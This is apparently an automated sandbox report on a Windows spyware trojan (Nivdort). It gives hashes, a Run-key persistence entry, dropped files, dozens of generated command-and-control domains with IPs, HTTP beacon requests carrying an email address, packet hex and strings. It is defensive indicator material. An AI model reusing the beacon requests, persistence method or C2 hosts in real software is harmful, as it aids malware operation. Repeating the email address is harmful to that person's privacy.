| Analysis Date | 2014-01-18 11:22:43 |
|---|---|
| MD5 | 0711e02cec3da34b30527b5fca8ea37a |
| SHA1 | e8261968968fc6e25ffc36526d55c49de808c029 |
Static Details:
| File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
|---|---|---|
| Section | .text md5: 6e28fb3f7f7024b20c945b2655b1da7f sha1: 3f4ab902ae62fef9d21228b7125dd47f11001325 size: 132608 | |
| Section | .rdata md5: caf784316d92de14dbb2176369ed297c sha1: f751fc494782f9f3944000fbe6c12c70ae01080f size: 19968 | |
| Section | .data md5: 1e16197f4ff8a44711125ca8bd653d9d sha1: 7e4ce89b4eb3ee63e6d2dcef40b1d61c9d10263b size: 16896 | |
| Timestamp | 2013-06-20 16:34:07 | |
| Packer | Microsoft Visual C++ ?.? | |
| PEhash | a97c5ffa48c3ddaa059691e2e2a4fe99d34a8636 | |
| AV | msse | TrojanSpy:Win32/Nivdort.O |
| AV | avg | Agent4.BNEC |
| AV | avira | TR/Spy.Nivdort.O.19 |
Runtime Details:
| Screenshot |  |
|---|
Process
↳ C:\malware.exe
| Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Store Virtual Engine Connectivity ➝ C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe |
|---|---|
| Creates File | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe |
| Creates Process | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe
| Creates File | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\vvellxwibwcj.exe |
|---|---|
| Creates File | \Device\Afd\Endpoint |
| Creates File | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.wnmvp |
| Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe"
Network Details:
| DNS | summertraining.net Type: A 108.175.146.162 |
|---|---|
| DNS | summerstorm.net Type: A 184.168.221.96 |
| DNS | crowdstorm.net Type: A 184.168.221.41 |
| DNS | watertraining.net Type: A 216.21.239.197 |
| DNS | thoughtstorm.net Type: A 192.232.218.155 |
| DNS | womantraining.net Type: A 64.124.15.253 |
| DNS | fighthunger.net Type: A 82.98.86.162 |
| DNS | fighttraining.net Type: A 176.74.176.179 |
| DNS | wateralthough.net Type: A 98.139.135.198 |
| DNS | knownhunger.net Type: A |
| DNS | begintraining.net Type: A |
| DNS | knowntraining.net Type: A |
| DNS | beginstorm.net Type: A |
| DNS | knownstorm.net Type: A |
| DNS | beginthrown.net Type: A |
| DNS | knownthrown.net Type: A |
| DNS | summerhunger.net Type: A |
| DNS | crowdhunger.net Type: A |
| DNS | crowdtraining.net Type: A |
| DNS | summerthrown.net Type: A |
| DNS | crowdthrown.net Type: A |
| DNS | thoughthunger.net Type: A |
| DNS | waterhunger.net Type: A |
| DNS | thoughttraining.net Type: A |
| DNS | waterstorm.net Type: A |
| DNS | thoughtthrown.net Type: A |
| DNS | waterthrown.net Type: A |
| DNS | womanhunger.net Type: A |
| DNS | smokehunger.net Type: A |
| DNS | smoketraining.net Type: A |
| DNS | womanstorm.net Type: A |
| DNS | smokestorm.net Type: A |
| DNS | womanthrown.net Type: A |
| DNS | smokethrown.net Type: A |
| DNS | partyhunger.net Type: A |
| DNS | partytraining.net Type: A |
| DNS | partystorm.net Type: A |
| DNS | fightstorm.net Type: A |
| DNS | partythrown.net Type: A |
| DNS | fightthrown.net Type: A |
| DNS | freshchoose.net Type: A |
| DNS | experiencechoose.net Type: A |
| DNS | freshalthough.net Type: A |
| DNS | experiencealthough.net Type: A |
| DNS | freshperiod.net Type: A |
| DNS | experienceperiod.net Type: A |
| DNS | freshhowever.net Type: A |
| DNS | experiencehowever.net Type: A |
| DNS | gentlemanchoose.net Type: A |
| DNS | alreadychoose.net Type: A |
| DNS | gentlemanalthough.net Type: A |
| DNS | alreadyalthough.net Type: A |
| DNS | gentlemanperiod.net Type: A |
| DNS | alreadyperiod.net Type: A |
| DNS | gentlemanhowever.net Type: A |
| DNS | alreadyhowever.net Type: A |
| DNS | followchoose.net Type: A |
| DNS | memberchoose.net Type: A |
| DNS | followalthough.net Type: A |
| DNS | memberalthough.net Type: A |
| DNS | followperiod.net Type: A |
| DNS | memberperiod.net Type: A |
| DNS | followhowever.net Type: A |
| DNS | memberhowever.net Type: A |
| DNS | beginchoose.net Type: A |
| DNS | knownchoose.net Type: A |
| DNS | beginalthough.net Type: A |
| DNS | knownalthough.net Type: A |
| DNS | beginperiod.net Type: A |
| DNS | knownperiod.net Type: A |
| DNS | beginhowever.net Type: A |
| DNS | knownhowever.net Type: A |
| DNS | summerchoose.net Type: A |
| DNS | crowdchoose.net Type: A |
| DNS | summeralthough.net Type: A |
| DNS | crowdalthough.net Type: A |
| DNS | summerperiod.net Type: A |
| DNS | crowdperiod.net Type: A |
| DNS | summerhowever.net Type: A |
| DNS | crowdhowever.net Type: A |
| DNS | thoughtchoose.net Type: A |
| DNS | waterchoose.net Type: A |
| DNS | thoughtalthough.net Type: A |
| DNS | thoughtperiod.net Type: A |
| DNS | waterperiod.net Type: A |
| HTTP GET | http://summertraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://summerstorm.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://crowdstorm.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://watertraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://thoughtstorm.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://womantraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://fighthunger.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://fighttraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| HTTP GET | http://wateralthough.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
| Flows TCP | 192.168.1.1:1031 ➝ 108.175.146.162:80 |
| Flows TCP | 192.168.1.1:1032 ➝ 184.168.221.96:80 |
| Flows TCP | 192.168.1.1:1033 ➝ 184.168.221.41:80 |
| Flows TCP | 192.168.1.1:1034 ➝ 216.21.239.197:80 |
| Flows TCP | 192.168.1.1:1035 ➝ 192.232.218.155:80 |
| Flows TCP | 192.168.1.1:1036 ➝ 64.124.15.253:80 |
| Flows TCP | 192.168.1.1:1037 ➝ 82.98.86.162:80 |
| Flows TCP | 192.168.1.1:1038 ➝ 176.74.176.179:80 |
| Flows TCP | 192.168.1.1:1039 ➝ 98.139.135.198:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207375 close..Host: su 0x00000070 (00112) 6d6d6572 74726169 6e696e67 2e6e6574 mmertraining.net 0x00000080 (00128) 0d0a0d0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207375 close..Host: su 0x00000070 (00112) 6d6d6572 73746f72 6d2e6e65 740d0a0d mmerstorm.net... 0x00000080 (00128) 0a0a0d0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206372 close..Host: cr 0x00000070 (00112) 6f776473 746f726d 2e6e6574 0d0a0d0a owdstorm.net.... 0x00000080 (00128) 0a0a0d0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207761 close..Host: wa 0x00000070 (00112) 74657274 7261696e 696e672e 6e65740d tertraining.net. 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207468 close..Host: th 0x00000070 (00112) 6f756768 7473746f 726d2e6e 65740d0a oughtstorm.net.. 0x00000080 (00128) 0d0a0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a20776f close..Host: wo 0x00000070 (00112) 6d616e74 7261696e 696e672e 6e65740d mantraining.net. 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206669 close..Host: fi 0x00000070 (00112) 67687468 756e6765 722e6e65 740d0a0d ghthunger.net... 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206669 close..Host: fi 0x00000070 (00112) 67687474 7261696e 696e672e 6e65740d ghttraining.net. 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207761 close..Host: wa 0x00000070 (00112) 74657261 6c74686f 7567682e 6e65740d teralthough.net. 0x00000080 (00128) 0a0d0a0a ....
Strings
Bjjj
H
((((( H
h(((( H
jjjh
jjjjj
KERNEL32.DLL
mscoree.dll
(null)
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0WWWWW
1#QNAN
1#SNAN
3NV]b\D
4h"YhN
/6tmA.:
8VVVVV
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
AbortPath
AccessCheckByType
AccessCheckByTypeResultList
AddAccessAllowedAce
AddAccessAllowedAceEx
AdjustTokenPrivileges
ADVAPI32.dll
AllocateAndInitializeSid
AllocateLocallyUniqueId
An application has made an attempt to load the C runtime library incorrectly.
AnimatePalette
AreAllAccessesGranted
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
BackupEventLogA
bad allocation
bad exception
Base Class Array'
Base Class Descriptor at (
__based(
BeginPaint
BeginPath
CallMsgFilterA
__cdecl
CF@SeD
ChangeTimerQueueTimer
CharLowerBuffA
CheckMenuItem
Class Hierarchy Descriptor'
CloseHandle
__clrcall
\CLr.hG9
@C=mh`P
CommConfigDialogA
CompareStringA
CompareStringW
Complete Object Locator'
CONOUT$
ConvertThreadToFiber
ConvertToAutoInheritPrivateObjectSecurity
`copy constructor closure'
CopyFileA
CorExitProcess
CreateCaret
CreateCompatibleDC
CreateDirectoryA
CreateDiscardableBitmap
CreateEventA
CreateFileA
CreateFileMappingA
CreateFontA
CreateIconFromResource
CreateIconFromResourceEx
CreateMailslotA
CreateMutexA
CreatePalette
CreatePrivateObjectSecurityWithMultipleInheritance
CreateProcessA
CreateRectRgn
CreateRemoteThread
CreateStreamOnHGlobal
CreateThread
CreateTimerQueueTimer
CreateToolhelp32Snapshot
CreateWaitableTimerA
CreateWindowExA
- CRT not initialized
@.data
dddd, MMMM dd, yyyy
DebugActiveProcess
December
DecodePointer
`default constructor closure'
DefWindowProcA
delete
delete[]
Delete
DeleteColorSpace
DeleteCriticalSection
DeleteEnhMetaFile
DeleteFiber
DeleteVolumeMountPointA
DestroyAcceleratorTable
DestroyIcon
DisconnectNamedPipe
DispatchMessageA
dm$#2
DOMAIN error
DPtoLP
DrawIcon
DrawTextExA
drr_29
`dynamic atexit destructor for '
`dynamic initializer for '
@E5f GM\F
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
EncodePointer
EndPaint
EnterCriticalSection
EnumClipboardFormats
EqualRect
ExitProcess
ExitWindowsEx
ExtTextOutA
f1X=0dy
__fastcall
February
F\h%$.
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindFirstVolumeA
FindResourceExA
FindWindowExA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
ForceRemove
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeUserPhysicalPages
Friday
^F<-uB
FVh(0B
F\=x.B
GAIsProcessorFeaturePresent
GDI32.dll
GdiFlush
GetAce
GetACP
GetActiveWindow
GetCapture
GetCaretPos
GetCharacterPlacementA
GetCharWidth32A
GetCharWidthI
GetClipRgn
GetColorSpace
GetComboBoxInfo
GetCommandLineA
GetCommModemStatus
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDesktopWindow
GetDeviceCaps
GetDeviceGammaRamp
GetDialogBaseUnits
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItemTextA
GetDriveTypeA
GetEnhMetaFileA
GetEnhMetaFileDescriptionA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetExitCodeThread
GetFileAttributesA
GetFileSize
GetFileSizeEx
GetFileTime
GetFileType
GetFullPathNameA
GetGlyphIndicesA
GetIconInfo
GetKernelObjectSecurity
GetKerningPairsA
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMapMode
GetMenuCheckMarkDimensions
GetMenuItemRect
GetMessageA
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetMonitorInfoA
GetNumaHighestNodeNumber
GetNumaProcessorNode
GetOEMCP
GetPolyFillMode
GetPrivateProfileIntA
GetPrivateProfileSectionA
GetProcAddress
GetProcessHeap
GetProcessIoCounters
GetProcessPriorityBoost
GetProcessShutdownParameters
GetProcessVersion
GetProcessWindowStation
GetProcessWorkingSetSize
GetProfileSectionA
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTempFileNameA
GetTempPathA
GetTextColor
GetThreadContext
GetTickCount
GetTimeZoneInformation
GetTitleBarInfo
GetUserObjectInformationA
GetUserObjectSecurity
GetVolumeNameForVolumeMountPointA
GetVolumePathNamesForVolumeNameA
GetWindowDC
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
GetWriteWatch
GlobalAlloc
GlobalCompact
GlobalFree
GlobalGetAtomNameA
GlobalLock
GlobalMemoryStatusEx
GlobalUnfix
GlobalUnlock
gNl0&DyXBVc
GWh(0B
`h````
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HeapWalk
`h`hhh
HH:mm:ss
HHtXHHt
>If90t
InitializeCriticalSectionAndSpinCount
InitializeSListHead
InSendMessageEx
InterlockedDecrement
InterlockedIncrement
InterlockedPopEntrySList
IntersectClipRect
InvalidateRect
InvalidateRgn
invalid string position
IsBadWritePtr
IsCharUpperA
IsClipboardFormatAvailable
IsDebuggerPresent
IsDialogMessageA
IsDlgButtonChecked
IsProcessorFeaturePresent
IsTextUnicode
IsValidCodePage
IsWindow
IsWindowEnabled
IsZoomed
JanFebMarAprMayJunJulAugSepOctNovDec
January
j,hpLB
j@j ^V
j"^SSSSS
jTh8HB
;JW-iJ
KERNEL32
KERNEL32.dll
k=HoZ.
LCMapStringA
LCMapStringW
lDAg+ X
LeaveCriticalSection
LoadCursorA
LoadCursorFromFileA
LoadKeyboardLayoutA
LoadLibraryA
LoadResource
LocalLock
LocalShrink
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LookupPrivilegeNameA
LPtoDP
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MapViewOfFileEx
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
ModifyWorldTransform
Monday
MoveFileA
MoveFileWithProgressA
MoveWindow
'-M'+U
MulDiv
MultiByteToWideChar
MxmMRHf
new[]
NoRemove
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(null)
Nwue b
ObjectOpenAuditAlarmA
)+obz<
October
OemKeyScan
OffsetClipRgn
ole32.dll
OLEAUT32.dll
`omni callsig'
OpenProcess
OpenThread
OpenThreadToken
operator
__pascal
PeekMessageA
PeekNamedPipe
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PolyDraw
PolyPolyline
PolyTextOutA
PostQueuedCompletionStatus
PostQuitMessage
PPPPPPPP
Process32First
Process32Next
Program:
<program name unknown>
__ptr64
- pure virtual function call
QQSVWd
QueryPerformanceCounter
RaiseException
rB13K0
`.rdata
ReadEventLogA
ReadFile
ReadFileEx
ReadProcessMemory
RegCloseKey
RegisterClassExA
RegisterDeviceNotificationA
RegisterHotKey
RegOpenKeyA
RegSetValueExA
RemoveFontResourceA
RemovePropA
ReplaceFileA
__restrict
ResumeThread
RtlUnwind
runtime error
Runtime Error!
Saturday
`scalar deleting destructor'
ScrollDC
ScrollWindowEx
SendInput
September
SetBkMode
SetCaretBlinkTime
SetClassLongA
SetClipboardData
SetComputerNameA
SetCursorPos
SetDlgItemInt
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetFileAttributesA
SetFilePointer
SetFirmwareEnvironmentVariableA
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuInfo
SetMenuItemInfoA
SetMessageQueue
SetMessageWaitingIndicator
SetMiterLimit
SetPolyFillMode
SetProcessAffinityMask
SetProcessDefaultLayout
SetRect
SetRectRgn
SetSecurityDescriptorControl
SetSecurityDescriptorGroup
SetStdHandle
SetStretchBltMode
SetSystemCursor
SetThreadPriorityBoost
SetUnhandledExceptionFilter
SetWindowTextA
SetWinMetaFileBits
ShowCaret
ShowScrollBar
ShowWindow
SING error
s[S;7|G;w
^SSSSS
__stdcall
`string'
string too long
Sunday
SunMonTueWedThuFriSat
t3hd.B
TerminateProcess
tGhl.B
tGHt.Ht&
t h4.B
t"h\.B
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
T(K36HsGZH
< tK< tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
<\tM</tI
tR99u2
TranslateMessage
TR(h*R
TryEnterCriticalSection
t"SS9]
<+t(<-t$:
t$<"u 3
Tuesday
;t$,v-
t+WWVPV
Type Descriptor'
`typeof'
u\.7t'
>:u8FV
`udt returning'
ujj4h|
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHook
UNICODE
UnionRect
Unknown exception
UnregisterWait
UpdateColors
UpdateResourceA
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
u[SSSP
UTF-16LE
`vbase destructor'
`vbtable'
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
V-faT0
`vftable'
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualQuery
v N+D$
_VVVVV
VVVVVQRSSj
WaitForInputIdle
WaitForSingleObject
WaitMessage
Wednesday
WideCharToMultiByte
WinHelpA
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStructA
WriteProfileStringA
WS2_32.dll
^WWWWW
xppwpp
xpxxxx
<xtX<XtT
>=Yt1j
YYhD.B